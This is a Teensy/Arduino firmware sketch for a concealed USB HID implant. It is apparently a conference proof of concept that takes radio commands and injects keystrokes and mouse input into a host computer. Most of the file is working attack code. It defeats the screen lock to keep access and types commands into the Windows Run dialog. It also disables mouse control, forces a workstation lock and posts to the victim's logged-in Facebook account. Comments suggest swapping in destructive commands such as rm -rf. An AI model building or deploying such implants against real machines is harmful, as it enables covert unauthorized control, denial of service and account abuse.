// Recevier_and_Exploit // Receiver RF commands and execute the exploits // by Monta Elkins // monta.defcon@geekslunch.com // http://www.hackerwarrior.com/urphuked // // (part of the exploit code below is derived from code from the Iron Geek http://www.irongeek.com) // //To learn more about Teensyduino see: //http://www.pjrc.com/teensy/teensyduino.html //http://www.arduino.cc/en/Reference/HomePage //Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions //Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change USB Vendor and Product ID // // int debug=0; // This line defines a "Uart" object to access the serial port HardwareSerial Uart = HardwareSerial(); int command_seq_no; int command_byte; int checksum; int checksum_in; int timeout; int last_command_seq_no=0; int carrier_bytes=0; int count=0; void setup() { Uart.begin(1200); // RF receiver if (debug>0){delay(10000);} if (debug>0){Keyboard.print ("Receiver Ready");} } void loop() { //============================================================ // Receiver // This code deals with receiving and verifying the attack // code (4 bits). Then the specified attack is executed below. //============================================================ int incomingByte; looking_for_carrier: carrier_bytes=0; while (carrier_bytes < 3) { // Wait for carrier detect (3 bytes of "AA" ) while (Uart.available()==0) { //wait for a byte } incomingByte = Uart.read(); if (incomingByte==170) { //"AA" hex carrier_bytes++; if (debug>2) { Keyboard.println(" Carrier Byte Received ");} } else { // didn't get a carrier byte- so reset if (debug>0) { if (carrier_bytes>0) { // only print if at least 1 was received Keyboard.println("--Carrier Receive Failed "); } } goto looking_for_carrier; } } ////////////////////////////////// // Carrier received successfully. 
////////////////////////////////// if (debug>2) { Keyboard.println("Full Carrier Received ");} ////////////////////////////////// // Wait if there are some more carrier bytes ////////////////////////////////// command_seq_no=170; while (command_seq_no == 170) { command_seq_no=Read_Wireless (); } if (debug>1) { Keyboard.print (" command_seq_no: "); Keyboard.println (command_seq_no); } if (command_seq_no > 127) { // invalid command seq number (too high) if (debug>2) { Keyboard.print (" command_seq_no invalid (too high) ");} goto looking_for_carrier; } // Get Command Byte command_byte=Read_Wireless (); // Get Check sum checksum=command_byte+command_seq_no; checksum_in=Read_Wireless (); if (checksum_in==checksum) { //////////////////////// // PASSED Checksum //////////////////////// if (debug>2) { Keyboard.println (" Checksum passed!");} // Now check that command_sequence_no is not the same as the last one. // That way we can transmit the same command multiple times withou // fear of executing it more than once per button press if (command_seq_no != last_command_seq_no) { // this command is NOT a repeat- so do it! // reset last_command_seq_no last_command_seq_no=command_seq_no; ////////////////////////////////// // Run command here ////////////////////////////////// if (debug>0) { Keyboard.print (" Running Command #:"); Keyboard.println (command_byte); } exploit(); if (debug>0) { Keyboard.println (" Returned from exploit"); } ////////////////////////////////////// } } else { // Checksum failed // The wireless connection can be noisy // so checksum has to pass before command is run if (debug>0) { Keyboard.println (" Checksum failed");} } } ///////////////////////////////////////////////////////////////////// // FUNCTIONS ///////////////////////////////////////////////////////////////////// // Read.Wireless // ok it has an ugly side. // a goto if a timeout is reached. deal. 
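// Block until the next byte arrives from the RF receiver and return it (0..255).
//
// NOTE (review): there is no timeout here -- the call never gives up. A byte
// lost mid-frame means the *next* byte fills the wrong field, which the
// checksum in loop() then has to catch. The `timeout` global is only used to
// print the wait message once per call; the original incremented it on every
// idle iteration, which overflows a 16-bit int while the link is quiet.
int Read_Wireless() {
  timeout = 0;
  while (Uart.available() == 0) {
    if (timeout == 0) {
      timeout = 1; // report the wait at most once per call
      if (debug > 0) { Keyboard.println(" Timeout waiting for receive char"); }
    }
  }
  return Uart.read();
}

//==================================================================
// Exploit code
// Once a frame is received and verified, the actual exploits are executed here.
//===================================================================
///////////////////////////
// Iron Geek
// Some of the exploit code is based on Irongeek's code to do simple keyboard/mouse functions with the Teensy,
// http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
/////////////////////////

// Status LED. Must be configured with pinMode(ledPin, OUTPUT) before the
// digitalWrite() calls below have any visible effect.
int ledPin = 11;

// Press KeyCode and release it, KeyCount times. Each press and each release
// is sent as its own HID report. KeyCount <= 0 sends nothing (the original
// compared with != and would spin forever on a negative count).
void PressAndRelease(int KeyCode, int KeyCount) {
  for (int i = 0; i < KeyCount; i++) {
    Keyboard.set_key1(KeyCode);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
  }
}

// Send one chord (modifier bitmask + key) as a press report followed by a
// full-release report, so the host does not see the key held down.
// HID modifier bits (see usb_api.h): 1 = Ctrl, 2 = Shift, 4 = Alt,
// 8 = GUI (Windows/Command), 128 = right GUI.
void PressChord(int modifier, int keycode) {
  Keyboard.set_modifier(modifier);
  Keyboard.set_key1(keycode);
  Keyboard.send_now();
  Keyboard.set_modifier(0); // release the modifier...
  Keyboard.set_key1(0);     // ...and the key, else the host auto-repeats it
  Keyboard.send_now();
}

// Open the Windows Run dialog (Win+R), type SomeCommand verbatim as
// keystrokes and press Enter. Nothing is escaped or validated here; the
// string is executed by the host exactly as the shell interprets it.
void CommandAtRunBar(const char *SomeCommand) {
  digitalWrite(ledPin, HIGH); // set the LED on
  PressChord(128, KEY_R);     // 128 = right GUI (Windows key)
  delay(1500);                // give the Run dialog time to take focus
  Keyboard.print(SomeCommand);
  PressAndRelease(KEY_ENTER, 1);
}

// B0000: move the mouse randomly for a few seconds (3000 small random moves).
// If you wanted to be more malicious, you could add random mouse clicks as well.
void MouseRandomMoves() {
  for (int i = 0; i < 3000; i++) {
    Mouse.move(random(-10, 11), random(-10, 11));
  }
}

// B0001: drive the pointer into the bottom-right corner and hold it there.
// Less obvious than random movement, but effectively keeps the user from
// having any mouse control for several seconds.
void MousePinBottomRight() {
  for (int i = 0; i < 10000; i++) {
    Mouse.move(100, 100);
  }
}

// B0010: keep the screensaver / screen lock from engaging -- forever.
// Nudges the pointer one pixel and back every move_time minutes, assuming the
// lock fires after 10 minutes of inactivity. This gives access after the user
// logs in and walks away from the terminal (at night etc.).
// Never returns: the receiver stops processing RF commands once this runs.
void DefeatScreenLock() {
  const unsigned long move_time = 9; // minutes between nudges
  while (1) {
    Mouse.move(0, 1);  // move mouse slightly
    Mouse.move(0, -1); // then move it back
    // Computed in unsigned long. The original `move_time*1000*60` was int
    // arithmetic; on the 16-bit AVR core this sketch targets (teensy_hid)
    // 540000 overflows a signed int, and in practice the wait came out at
    // roughly 15 s instead of 9 minutes.
    delay(move_time * 60UL * 1000UL);
  }
}

// B0101: Windows (XP) demo -- open Notepad from the Run dialog and type a
// message. If you are doing the attack without a transmitter trigger you need
// a long delay (~30 s or more on XP) for the first HID registration; see the
// commented-out delay.
void WindowsNotepadDemo() {
  // delay(60000);
  digitalWrite(ledPin, HIGH); // set the LED on
  CommandAtRunBar("notepad.exe");
  delay(1500);
  Keyboard.print("Pwnzored by Monta");
}

// B1101: Linux demo -- Alt+F2 run dialog, launch xterm, type a message.
// (tested on Ubuntu, Fedora and Backtrack per the original author.)
// Of course the typed text could just as easily be a command like rm -rf.
void LinuxXtermDemo() {
  PressChord(4, KEY_F2); // 4 = Alt
  delay(1500);
  // Keyboard.print("gedit");
  Keyboard.print("xterm");
  PressAndRelease(KEY_ENTER, 1);
  delay(750);
  Keyboard.print("This machine pwned by Monta!");
}

// B1001: Apple demo (untested by the original author).
// A newly attached keyboard makes OS X ask the user to identify it; the
// opening sequence [space] z / [tab] [tab] [space] is meant to answer that
// dialog and dismiss it. Then Cmd+Space is pressed and Enter sent.
// NOTE (review): the line that would type "textedit.app" is commented out,
// so as written Enter is pressed with nothing typed and the message lands in
// whatever has focus afterwards. Emulating a standard Dell/Windows keyboard
// (usb_private.h vendor/product IDs) may avoid the identification dialog.
void AppleTextEditDemo() {
  PressAndRelease(KEY_SPACE, 1);
  PressAndRelease(KEY_Z, 1);
  PressAndRelease(KEY_SLASH, 1);
  PressAndRelease(KEY_TAB, 2);
  PressAndRelease(KEY_SPACE, 1);
  // Start up textedit.app and type in it
  PressChord(8, KEY_SPACE); // 8 = GUI (Command) key -- not Alt as the original comment said
  delay(750);
  // Keyboard.print("textedit.app");
  PressAndRelease(KEY_ENTER, 1);
  delay(750);
  Keyboard.print("This machine pwned by Monta!");
}

// B0110: lock the workstation on Windows -- Ctrl+Alt+Del, then Enter.
// Ctrl+Alt+Del is the Secure Attention Sequence and a USB HID keyboard is
// allowed to send it. Enter is presumably meant to hit the default button of
// the XP-era Windows Security dialog -- not verified here.
// Makes a cute denial of service.
void WindowsLockWorkstation() {
  digitalWrite(ledPin, HIGH); // set the LED on
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_DELETE);
  Keyboard.send_now();
  // Modifier release and the Enter press go out in one report, 1.5 s later,
  // once the dialog has had time to appear. Kept exactly as originally sent.
  Keyboard.set_modifier(0);
  Keyboard.set_key1(KEY_ENTER);
  delay(1500);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

// B0111 (first handler): open the default browser on a page of kittens.
// The screen can then be "locked" by rendering the mouse useless (B0000/B0001).
void WindowsOpenBrowser() {
  digitalWrite(ledPin, HIGH); // set the LED on
  CommandAtRunBar("cmd /c start http://www.hackerwarrior/kitty_porn.html");
}

// B0111 (second handler): post to Facebook through the mobile site, assuming
// the user is already logged in. The Tab counts are hard-coded against the
// m.facebook.com layout of the time and will not survive page changes.
void WindowsFacebookPost() {
  digitalWrite(ledPin, HIGH); // set the LED on
  CommandAtRunBar("cmd /c start http://m.facebook.com");
  delay(6000); // wait for the page to load
  PressAndRelease(KEY_TAB, 8);
  Keyboard.print("Test from urfuked device, more info at http://www.hackerwarrior.com/urfuked");
  PressAndRelease(KEY_TAB, 1);
  PressAndRelease(KEY_ENTER, 1);
}

// Dispatch the command in the global command_byte (set by loop()) to its
// handler. Commands are 4-bit codes; unknown codes do nothing.
void exploit() {
  switch (command_byte) {
    case B0000: MouseRandomMoves(); break;
    case B0001: MousePinBottomRight(); break;
    case B0010: DefeatScreenLock(); break; // never returns
    case B0101: WindowsNotepadDemo(); break;
    case B1101: LinuxXtermDemo(); break;
    case B1001: AppleTextEditDemo(); break;
    case B0110: WindowsLockWorkstation(); break;
    case B0111:
      // BUG (review): the original assigned B0111 to both the browser and the
      // Facebook action, so both run back to back. Preserved as-is; move one
      // of them to an unused 4-bit code if that is not the intent.
      WindowsOpenBrowser();
      WindowsFacebookPost();
      break;
    default:
      break;
  }
}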